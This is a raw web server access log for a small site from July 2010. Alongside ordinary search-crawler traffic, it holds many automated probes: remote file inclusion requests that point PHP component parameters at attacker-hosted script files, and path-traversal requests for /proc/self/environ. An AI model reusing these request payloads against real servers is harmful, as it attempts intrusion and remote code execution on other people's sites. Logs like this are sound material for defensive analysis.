217.18.65.24 - - [20/Jul/2010:23:17:36 -0700] "GET /logs//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
217.18.65.24 - - [20/Jul/2010:23:17:36 -0700] "GET /logs/access_100531.log//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
217.18.65.24 - - [20/Jul/2010:23:17:38 -0700] "GET /logs/access_100531.log//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
217.18.65.24 - - [20/Jul/2010:23:17:38 -0700] "GET /administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
217.18.65.24 - - [20/Jul/2010:23:17:38 -0700] "GET /logs//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
217.18.65.24 - - [20/Jul/2010:23:17:57 -0700] "GET /logs/access_100531.log//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
217.18.65.24 - - [20/Jul/2010:23:17:57 -0700] "GET /logs//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
217.18.65.24 - - [20/Jul/2010:23:17:57 -0700] "GET /administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.92.222.254 - - [20/Jul/2010:23:28:53 -0700] "GET /logs/access_100524.log HTTP/1.1" 404 - "-" "Mozilla/4.0" "www.redneckmba.com"
212.209.45.98 - - [20/Jul/2010:23:28:42 -0700] "GET /logs/access_100524.log HTTP/1.1" 404 - "http://www.google.se/search?q=%22advanced_comment_system%2Findex.php%3FACS_path%22&ie=utf-8&oe=utf-8&aq=t&rls=com.ubuntu:en-US:unofficial&client=firefox-a" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.19) Gecko/2010040118 Ubuntu/8.10 (intrepid) Firefox/3.0.19" "www.redneckmba.com"
212.209.45.98 - - [20/Jul/2010:23:28:54 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.19) Gecko/2010040118 Ubuntu/8.10 (intrepid) Firefox/3.0.19" "www.redneckmba.com"
212.209.45.98 - - [20/Jul/2010:23:28:46 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.19) Gecko/2010040118 Ubuntu/8.10 (intrepid) Firefox/3.0.19" "www.redneckmba.com"
76.13.114.106 - - [20/Jul/2010:23:37:33 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.195.114.41 - - [20/Jul/2010:23:41:20 -0700] "GET /logs/ HTTP/1.0" 200 1923 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.redneckmba.com"
193.47.80.50 - - [20/Jul/2010:23:47:16 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "redneckmba.com"
193.47.80.50 - - [20/Jul/2010:23:47:16 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "redneckmba.com"
76.13.123.194 - - [20/Jul/2010:23:50:58 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.205 - - [20/Jul/2010:23:57:38 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [21/Jul/2010:00:11:50 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
188.165.217.175 - - [21/Jul/2010:00:15:23 -0700] "GET /logs/?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [21/Jul/2010:00:15:24 -0700] "GET /?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.redneckmba.com"
95.154.248.22 - - [21/Jul/2010:00:16:13 -0700] "GET /logs/?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.823" "www.redneckmba.com"
95.154.248.22 - - [21/Jul/2010:00:16:13 -0700] "GET /?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.823" "www.redneckmba.com"
188.165.217.175 - - [21/Jul/2010:00:17:32 -0700] "GET /logs/?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [21/Jul/2010:00:17:33 -0700] "GET /?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [21/Jul/2010:00:17:51 -0700] "GET /logs/?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [21/Jul/2010:00:17:51 -0700] "GET /?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.redneckmba.com"
66.163.171.207 - - [21/Jul/2010:00:42:01 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
77.221.145.35 - - [21/Jul/2010:00:42:50 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "www.redneckmba.com"
77.221.145.35 - - [21/Jul/2010:00:42:50 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "www.redneckmba.com"
76.13.114.105 - - [21/Jul/2010:00:48:04 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.194 - - [21/Jul/2010:00:53:26 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
74.55.96.234 - - [21/Jul/2010:01:22:57 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://yuliana.zoomshare.com/files/2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
74.55.96.234 - - [21/Jul/2010:01:22:57 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://yuliana.zoomshare.com/files/2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
74.55.96.234 - - [21/Jul/2010:01:22:57 -0700] "GET /logs/access.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://yuliana.zoomshare.com/files/2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
74.55.96.234 - - [21/Jul/2010:01:23:03 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://yuliana.zoomshare.com/files/2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
74.55.96.234 - - [21/Jul/2010:01:23:03 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://yuliana.zoomshare.com/files/2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
74.55.96.234 - - [21/Jul/2010:01:23:03 -0700] "GET /logs/access.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://yuliana.zoomshare.com/files/2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [21/Jul/2010:01:23:43 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [21/Jul/2010:01:23:43 -0700] "GET /ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [21/Jul/2010:01:23:43 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [21/Jul/2010:01:23:49 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [21/Jul/2010:01:23:49 -0700] "GET /ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [21/Jul/2010:01:23:49 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
62.44.82.118 - - [21/Jul/2010:01:23:50 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
62.44.82.118 - - [21/Jul/2010:01:23:50 -0700] "GET /ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
62.44.82.118 - - [21/Jul/2010:01:23:50 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [21/Jul/2010:01:23:53 -0700] "GET /ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [21/Jul/2010:01:23:53 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [21/Jul/2010:01:23:53 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [21/Jul/2010:01:23:55 -0700] "GET /ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [21/Jul/2010:01:23:55 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [21/Jul/2010:01:23:55 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
62.44.82.118 - - [21/Jul/2010:01:24:11 -0700] "GET /ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
62.44.82.118 - - [21/Jul/2010:01:24:11 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
62.44.82.118 - - [21/Jul/2010:01:24:11 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.107 - - [21/Jul/2010:01:27:48 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.207 - - [21/Jul/2010:01:29:52 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
188.64.184.81 - - [21/Jul/2010:01:31:05 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
188.64.184.81 - - [21/Jul/2010:01:31:05 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
188.64.184.81 - - [21/Jul/2010:01:31:05 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
217.18.65.24 - - [21/Jul/2010:01:59:25 -0700] "GET /logs//admin/auth.php?xcart_dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
217.18.65.24 - - [21/Jul/2010:01:59:25 -0700] "GET /logs/access.log//admin/auth.php?xcart_dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
217.18.65.24 - - [21/Jul/2010:01:59:25 -0700] "GET /admin/auth.php?xcart_dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
217.18.65.24 - - [21/Jul/2010:01:59:28 -0700] "GET /logs/access.log//admin/auth.php?xcart_dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
217.18.65.24 - - [21/Jul/2010:01:59:28 -0700] "GET /logs//admin/auth.php?xcart_dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
217.18.65.24 - - [21/Jul/2010:01:59:28 -0700] "GET /admin/auth.php?xcart_dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
217.18.65.24 - - [21/Jul/2010:01:59:57 -0700] "GET /admin/auth.php?xcart_dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
217.18.65.24 - - [21/Jul/2010:01:59:57 -0700] "GET /logs//admin/auth.php?xcart_dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
217.18.65.24 - - [21/Jul/2010:01:59:57 -0700] "GET /logs/access.log%20%20//admin/auth.php?xcart_dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
217.18.65.24 - - [21/Jul/2010:02:00:07 -0700] "GET /admin/auth.php?xcart_dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
217.18.65.24 - - [21/Jul/2010:02:00:07 -0700] "GET /logs/access.log%20%20//admin/auth.php?xcart_dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
217.18.65.24 - - [21/Jul/2010:02:00:07 -0700] "GET /logs//admin/auth.php?xcart_dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.195 - - [21/Jul/2010:02:01:49 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [21/Jul/2010:02:10:11 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.195.114.41 - - [21/Jul/2010:02:10:48 -0700] "GET /tmp/?M=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.redneckmba.com"
96.0.251.231 - - [21/Jul/2010:02:13:50 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [21/Jul/2010:02:13:50 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [21/Jul/2010:02:13:50 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [21/Jul/2010:02:14:24 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [21/Jul/2010:02:14:24 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [21/Jul/2010:02:14:24 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.205 - - [21/Jul/2010:02:20:58 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
188.64.184.81 - - [21/Jul/2010:02:31:40 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.195.114.41 - - [21/Jul/2010:02:41:19 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:02:52:59 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
76.13.114.105 - - [21/Jul/2010:02:55:54 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
62.73.4.22 - - [21/Jul/2010:03:05:42 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.salafimedia.com/tmp/id HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
62.73.4.22 - - [21/Jul/2010:03:05:50 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.salafimedia.com/tmp/id HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
195.56.189.71 - - [21/Jul/2010:03:10:09 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
195.56.189.71 - - [21/Jul/2010:03:10:14 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
76.13.123.194 - - [21/Jul/2010:03:13:59 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.207 - - [21/Jul/2010:03:15:00 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
95.108.150.235 - - [21/Jul/2010:03:25:56 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "redneckmba.com"
95.108.150.235 - - [21/Jul/2010:03:25:56 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.redneckmba.com"
95.108.150.235 - - [21/Jul/2010:03:25:58 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "redneckmba.com"
95.108.150.235 - - [21/Jul/2010:03:25:59 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "redneckmba.com"
95.108.150.235 - - [21/Jul/2010:03:25:59 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.redneckmba.com"
95.108.150.235 - - [21/Jul/2010:03:26:00 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.redneckmba.com"
67.231.245.178 - - [21/Jul/2010:03:26:53 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/Firefox" "www.redneckmba.com"
76.13.114.105 - - [21/Jul/2010:03:45:22 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
62.73.4.22 - - [21/Jul/2010:03:47:51 -0700] "GET /logs/access_100531.log//components/com_flyspray/startdown.php?file=http://www.salafimedia.com/tmp/id HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
62.73.4.22 - - [21/Jul/2010:03:47:51 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.salafimedia.com/tmp/id HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
62.73.4.22 - - [21/Jul/2010:03:47:51 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.salafimedia.com/tmp/id HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
62.73.4.22 - - [21/Jul/2010:03:47:58 -0700] "GET /logs/access_100614.log//components/com_flyspray/startdown.php?file=http://www.salafimedia.com/tmp/id HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
62.73.4.22 - - [21/Jul/2010:03:47:58 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.salafimedia.com/tmp/id HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
62.73.4.22 - - [21/Jul/2010:03:47:59 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.salafimedia.com/tmp/id HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
220.181.94.220 - - [21/Jul/2010:03:51:26 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.redneckmba.com"
220.181.94.220 - - [21/Jul/2010:03:51:36 -0700] "GET / HTTP/1.1" 200 779 "-" "Sogou-Test-Spider/4.0 (compatible; MSIE 5.5; Windows 98)" "www.redneckmba.com"
88.131.106.22 - - [21/Jul/2010:04:05:02 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
88.131.106.22 - - [21/Jul/2010:04:05:06 -0700] "GET /?M=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
66.163.171.205 - - [21/Jul/2010:04:15:11 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.249.65.89 - - [21/Jul/2010:04:20:40 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "redneckmba.com"
76.13.123.195 - - [21/Jul/2010:04:33:02 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
77.240.118.133 - - [21/Jul/2010:04:33:46 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.musitalentos.com/e107_files/images/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.redneckmba.com"
77.240.118.133 - - [21/Jul/2010:04:33:46 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.musitalentos.com/e107_files/images/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.redneckmba.com"
76.13.114.106 - - [21/Jul/2010:04:39:36 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
77.240.118.133 - - [21/Jul/2010:04:52:25 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.musitalentos.com/e107_files/images/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.redneckmba.com"
77.240.118.133 - - [21/Jul/2010:04:52:25 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.musitalentos.com/e107_files/images/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.redneckmba.com"
122.201.82.173 - - [21/Jul/2010:05:14:28 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.bangkoklimo4u.com/image_post/id.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "redneckmba.com"
122.201.82.173 - - [21/Jul/2010:05:14:28 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bangkoklimo4u.com/image_post/id.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "redneckmba.com"
122.201.82.173 - - [21/Jul/2010:05:14:28 -0700] "GET /logs/access_100531.log//components/com_simpleboard/image_upload.php?sbp=http://www.bangkoklimo4u.com/image_post/id.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "redneckmba.com"
122.201.82.173 - - [21/Jul/2010:05:14:52 -0700] "GET /logs/access_100607.log//components/com_simpleboard/image_upload.php?sbp=http://www.bangkoklimo4u.com/image_post/id.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "redneckmba.com"
